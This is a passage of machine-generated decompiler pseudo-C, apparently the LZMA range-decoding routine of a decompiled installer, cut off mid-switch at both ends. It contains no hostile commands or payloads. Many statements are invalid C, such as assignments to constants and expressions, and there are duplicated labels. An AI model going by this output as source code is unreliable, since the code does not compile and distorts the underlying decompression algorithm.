                      											case 3:
                      												L21:
                      												__eflags =  *(_t621 - 0x6c);
                      												if( *(_t621 - 0x6c) == 0) {
                      													 *(_t621 - 0x88) = 3;
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												_t67 = _t621 - 0x70;
                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                      												__eflags =  *_t67;
                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                      												L23:
                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                      												if( *(_t621 - 0x48) != 0) {
                      													goto L21;
                      												}
                      												goto L24;
                      											case 4:
                      												L133:
                      												_t540 =  *_t614;
                      												_t597 = _t540 & 0x0000ffff;
                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                      												if( *(_t621 - 0xc) >= _t573) {
                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                      													 *(_t621 - 0x40) = 1;
                      													_t541 = _t540 - (_t540 >> 5);
                      													 *_t614 = _t541;
                      												} else {
                      													 *(_t621 - 0x10) = _t573;
                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                      												}
                      												if( *(_t621 - 0x10) >= 0x1000000) {
                      													goto L139;
                      												}
                      											case 5:
                      												goto L137;
                      											case 6:
                      												__edx = 0;
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x34) = 1;
                      													 *(__ebp - 0x84) = 7;
                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      												__esi =  *(__ebp - 0x60);
                      												__cl = 8;
                      												__cl = 8 -  *(__ebp - 0x3c);
                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      												__ecx =  *(__ebp - 0x3c);
                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      												__ecx =  *(__ebp - 4);
                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      												__eflags =  *(__ebp - 0x38) - 4;
                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												if( *(__ebp - 0x38) >= 4) {
                      													__eflags =  *(__ebp - 0x38) - 0xa;
                      													if( *(__ebp - 0x38) >= 0xa) {
                      														_t98 = __ebp - 0x38;
                      														 *_t98 =  *(__ebp - 0x38) - 6;
                      														__eflags =  *_t98;
                      													} else {
                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      													}
                      												} else {
                      													 *(__ebp - 0x38) = 0;
                      												}
                      												__eflags =  *(__ebp - 0x34) - __edx;
                      												if( *(__ebp - 0x34) == __edx) {
                      													__ebx = 0;
                      													__ebx = 1;
                      													goto L61;
                      												} else {
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__ecx =  *(__ebp - 8);
                      													__ebx = 0;
                      													__ebx = 1;
                      													__al =  *((intOrPtr*)(__eax + __ecx));
                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      													goto L41;
                      												}
                      											case 7:
                      												goto L0;
                      											case 8:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xa;
                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      												} else {
                      													__eax =  *(__ebp - 0x38);
                      													__ecx =  *(__ebp - 4);
                      													__eax =  *(__ebp - 0x38) + 0xf;
                      													 *(__ebp - 0x84) = 9;
                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      												}
                      												while(1) {
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      											case 9:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													goto L89;
                      												}
                      												__eflags =  *(__ebp - 0x60);
                      												if( *(__ebp - 0x60) == 0) {
                      													goto L171;
                      												}
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      												__eflags = _t258;
                      												0 | _t258 = _t258 + _t258 + 9;
                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      												goto L75;
                      											case 0xa:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xb;
                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      													while(1) {
                      														L132:
                      														 *(_t621 - 0x54) = _t614;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x28);
                      												goto L88;
                      											case 0xb:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__ecx =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x20);
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												} else {
                      													__eax =  *(__ebp - 0x24);
                      												}
                      												__ecx =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												L88:
                      												__ecx =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x2c) = __eax;
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												L89:
                      												__eax =  *(__ebp - 4);
                      												 *(__ebp - 0x80) = 0x15;
                      												__eax =  *(__ebp - 4) + 0xa68;
                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      												goto L68;
                      											case 0xc:
                      												L99:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xc;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t334 = __ebp - 0x70;
                      												 *_t334 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t334;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												__eax =  *(__ebp - 0x2c);
                      												goto L101;
                      											case 0xd:
                      												L37:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xd;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t122 = __ebp - 0x70;
                      												 *_t122 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t122;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L39:
                      												__eax =  *(__ebp - 0x40);
                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      													goto L48;
                      												}
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													goto L54;
                      												}
                      												L41:
                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      												 *(__ebp - 0x48) = __eax;
                      												__eax = __eax + 1;
                      												__eax = __eax << 8;
                      												__eax = __eax + __ebx;
                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edx = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													 *(__ebp - 0x40) = 1;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													__ebx = __ebx + __ebx + 1;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edx;
                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L39;
                      												} else {
                      													goto L37;
                      												}
                      											case 0xe:
                      												L46:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xe;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t156 = __ebp - 0x70;
                      												 *_t156 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t156;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												while(1) {
                      													L48:
                      													__eflags = __ebx - 0x100;
                      													if(__ebx >= 0x100) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x58);
                      													__edx = __ebx + __ebx;
                      													__ecx =  *(__ebp - 0x10);
                      													__esi = __edx + __eax;
                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                      													__ax =  *__esi;
                      													 *(__ebp - 0x54) = __esi;
                      													__edi = __ax & 0x0000ffff;
                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      													__eflags =  *(__ebp - 0xc) - __ecx;
                      													if( *(__ebp - 0xc) >= __ecx) {
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      														__cx = __ax;
                      														_t170 = __edx + 1; // 0x1
                      														__ebx = _t170;
                      														__cx = __ax >> 5;
                      														__eflags = __eax;
                      														 *__esi = __ax;
                      													} else {
                      														 *(__ebp - 0x10) = __ecx;
                      														0x800 = 0x800 - __edi;
                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      														__ebx = __ebx + __ebx;
                      														 *__esi = __cx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														continue;
                      													} else {
                      														goto L46;
                      													}
                      												}
                      												L54:
                      												_t173 = __ebp - 0x34;
                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      												__eflags =  *_t173;
                      												goto L55;
                      											case 0xf:
                      												L58:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xf;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t203 = __ebp - 0x70;
                      												 *_t203 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t203;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L60:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													L55:
                      													__al =  *(__ebp - 0x44);
                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      													goto L56;
                      												}
                      												L61:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t217 = __edx + 1; // 0x1
                      													__ebx = _t217;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L60;
                      												} else {
                      													goto L58;
                      												}
                      											case 0x10:
                      												L109:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x10;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t365 = __ebp - 0x70;
                      												 *_t365 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t365;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												goto L111;
                      											case 0x11:
                      												L68:
                      												_t614 =  *(_t621 - 0x58);
                      												 *(_t621 - 0x84) = 0x12;
                      												while(1) {
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      											case 0x12:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 0x58);
                      													 *(__ebp - 0x84) = 0x13;
                      													__esi =  *(__ebp - 0x58) + 2;
                      													while(1) {
                      														L132:
                      														 *(_t621 - 0x54) = _t614;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												__eflags = __eax;
                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                      												goto L130;
                      											case 0x13:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													_t469 = __ebp - 0x58;
                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                      													__eflags =  *_t469;
                      													 *(__ebp - 0x30) = 0x10;
                      													 *(__ebp - 0x40) = 8;
                      													L144:
                      													 *(__ebp - 0x7c) = 0x14;
                      													goto L145;
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												 *(__ebp - 0x30) = 8;
                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      												L130:
                      												 *(__ebp - 0x58) = __eax;
                      												 *(__ebp - 0x40) = 3;
                      												goto L144;
                      											case 0x14:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      												__eax =  *(__ebp - 0x80);
                      												 *(_t621 - 0x88) = _t542;
                      												goto L1;
                      											case 0x15:
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xb;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      												goto L120;
                      											case 0x16:
                      												__eax =  *(__ebp - 0x30);
                      												__eflags = __eax - 4;
                      												if(__eax >= 4) {
                      													_push(3);
                      													_pop(__eax);
                      												}
                      												__ecx =  *(__ebp - 4);
                      												 *(__ebp - 0x40) = 6;
                      												__eax = __eax << 7;
                      												 *(__ebp - 0x7c) = 0x19;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L145;
                      											case 0x17:
                      												L145:
                      												__eax =  *(__ebp - 0x40);
                      												 *(__ebp - 0x50) = 1;
                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      												goto L149;
                      											case 0x18:
                      												L146:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x18;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t484 = __ebp - 0x70;
                      												 *_t484 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t484;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L148:
                      												_t487 = __ebp - 0x48;
                      												 *_t487 =  *(__ebp - 0x48) - 1;
                      												__eflags =  *_t487;
                      												L149:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__ecx =  *(__ebp - 0x40);
                      													__ebx =  *(__ebp - 0x50);
                      													0 = 1;
                      													__eax = 1 << __cl;
                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      													__eax =  *(__ebp - 0x7c);
                      													 *(__ebp - 0x44) = __ebx;
                      													while(1) {
                      														 *(_t621 - 0x88) = _t542;
                      														goto L1;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x50);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      												__eax =  *(__ebp - 0x58);
                      												__esi = __edx + __eax;
                      												 *(__ebp - 0x54) = __esi;
                      												__ax =  *__esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													__cx = __ax >> 5;
                      													__eax = __eax - __ecx;
                      													__edx = __edx + 1;
                      													__eflags = __edx;
                      													 *__esi = __ax;
                      													 *(__ebp - 0x50) = __edx;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L148;
                      												} else {
                      													goto L146;
                      												}
                      											case 0x19:
                      												__eflags = __ebx - 4;
                      												if(__ebx < 4) {
                      													 *(__ebp - 0x2c) = __ebx;
                      													L119:
                      													_t393 = __ebp - 0x2c;
                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                      													__eflags =  *_t393;
                      													L120:
                      													__eax =  *(__ebp - 0x2c);
                      													__eflags = __eax;
                      													if(__eax == 0) {
                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      														goto L170;
                      													}
                      													__eflags = __eax -  *(__ebp - 0x60);
                      													if(__eax >  *(__ebp - 0x60)) {
                      														goto L171;
                      													}
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      													__eax =  *(__ebp - 0x30);
                      													_t400 = __ebp - 0x60;
                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      													__eflags =  *_t400;
                      													goto L123;
                      												}
                      												__ecx = __ebx;
                      												__eax = __ebx;
                      												__ecx = __ebx >> 1;
                      												__eax = __ebx & 0x00000001;
                      												__ecx = (__ebx >> 1) - 1;
                      												__al = __al | 0x00000002;
                      												__eax = (__ebx & 0x00000001) << __cl;
                      												__eflags = __ebx - 0xe;
                      												 *(__ebp - 0x2c) = __eax;
                      												if(__ebx >= 0xe) {
                      													__ebx = 0;
                      													 *(__ebp - 0x48) = __ecx;
                      													L102:
                      													__eflags =  *(__ebp - 0x48);
                      													if( *(__ebp - 0x48) <= 0) {
                      														__eax = __eax + __ebx;
                      														 *(__ebp - 0x40) = 4;
                      														 *(__ebp - 0x2c) = __eax;
                      														__eax =  *(__ebp - 4);
                      														__eax =  *(__ebp - 4) + 0x644;
                      														__eflags = __eax;
                      														L108:
                      														__ebx = 0;
                      														 *(__ebp - 0x58) = __eax;
                      														 *(__ebp - 0x50) = 1;
                      														 *(__ebp - 0x44) = 0;
                      														 *(__ebp - 0x48) = 0;
                      														L112:
                      														__eax =  *(__ebp - 0x40);
                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      															_t391 = __ebp - 0x2c;
                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      															__eflags =  *_t391;
                      															goto L119;
                      														}
                      														__eax =  *(__ebp - 0x50);
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      														__eax =  *(__ebp - 0x58);
                      														__esi = __edi + __eax;
                      														 *(__ebp - 0x54) = __esi;
                      														__ax =  *__esi;
                      														__ecx = __ax & 0x0000ffff;
                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      														__eflags =  *(__ebp - 0xc) - __edx;
                      														if( *(__ebp - 0xc) >= __edx) {
                      															__ecx = 0;
                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      															__ecx = 1;
                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      															__ebx = 1;
                      															__ecx =  *(__ebp - 0x48);
                      															__ebx = 1 << __cl;
                      															__ecx = 1 << __cl;
                      															__ebx =  *(__ebp - 0x44);
                      															__ebx =  *(__ebp - 0x44) | __ecx;
                      															__cx = __ax;
                      															__cx = __ax >> 5;
                      															__eax = __eax - __ecx;
                      															__edi = __edi + 1;
                      															__eflags = __edi;
                      															 *(__ebp - 0x44) = __ebx;
                      															 *__esi = __ax;
                      															 *(__ebp - 0x50) = __edi;
                      														} else {
                      															 *(__ebp - 0x10) = __edx;
                      															0x800 = 0x800 - __ecx;
                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      															 *__esi = __dx;
                      														}
                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                      														if( *(__ebp - 0x10) >= 0x1000000) {
                      															L111:
                      															_t368 = __ebp - 0x48;
                      															 *_t368 =  *(__ebp - 0x48) + 1;
                      															__eflags =  *_t368;
                      															goto L112;
                      														} else {
                      															goto L109;
                      														}
                      													}
                      													__ecx =  *(__ebp - 0xc);
                      													__ebx = __ebx + __ebx;
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      														__ecx =  *(__ebp - 0x10);
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      														__ebx = __ebx | 0x00000001;
                      														__eflags = __ebx;
                      														 *(__ebp - 0x44) = __ebx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L101:
                      														_t338 = __ebp - 0x48;
                      														 *_t338 =  *(__ebp - 0x48) - 1;
                      														__eflags =  *_t338;
                      														goto L102;
                      													} else {
                      														goto L99;
                      													}
                      												}
                      												__edx =  *(__ebp - 4);
                      												__eax = __eax - __ebx;
                      												 *(__ebp - 0x40) = __ecx;
                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      												goto L108;
                      											case 0x1a:
                      												L56:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1a;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x68);
                      												__al =  *(__ebp - 0x5c);
                      												__edx =  *(__ebp - 8);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *( *(__ebp - 0x68)) = __al;
                      												__ecx =  *(__ebp - 0x14);
                      												 *(__ecx +  *(__ebp - 8)) = __al;
                      												__eax = __ecx + 1;
                      												__edx = 0;
                      												_t192 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t192;
                      												goto L79;
                      											case 0x1b:
                      												L75:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1b;
                      													goto L170;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
